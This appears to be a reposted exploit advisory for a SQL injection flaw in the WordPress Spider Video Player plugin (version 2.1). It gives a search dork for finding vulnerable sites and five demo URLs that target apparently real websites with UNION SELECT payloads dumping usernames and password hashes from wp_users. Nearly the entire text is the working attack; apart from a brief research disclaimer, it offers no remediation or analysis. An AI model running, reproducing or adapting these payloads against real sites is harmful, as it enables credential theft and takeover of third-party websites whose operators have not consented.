• Wordpress Spider Video Player plugin SQL Injection


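    Test method:

    The program (method) may be offensive in nature; it is provided for security research and teaching purposes only. Use at your own risk!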
      # Exploit Title : Wordpress Spider Video Player plugin SQL Injection
      #
      # Exploit Author : Ashiyane Digital Security Team
      #
      # Plugin Link : http://web-dorado.com/
      #
      # Home : www.ashiyane.org
      #
      # Security Risk : High
      #
      # Version : 2.1
      #
      # Dork : inurl:wp-content/plugins/player/settings.php?playlist=
      #
      # Tested on: Linux
      #
      ##############
      #Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
      #
      #
      #DEm0:
      # http://www.voyager-channel.org/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      #
      # http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      #
      # http://tremendum.org/wp-content/plugins/player/settings.php?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      #
      # http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      #
      # http://www.lancssa.com/wp-content/plugins/player/settings.php?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      #
      ##############
      #Greetz to: My Lord ALLAH
      ##############
      #
      # Amirh03in
      #
      ##############
  • Original article: https://www.cnblogs.com/security4399/p/3015576.html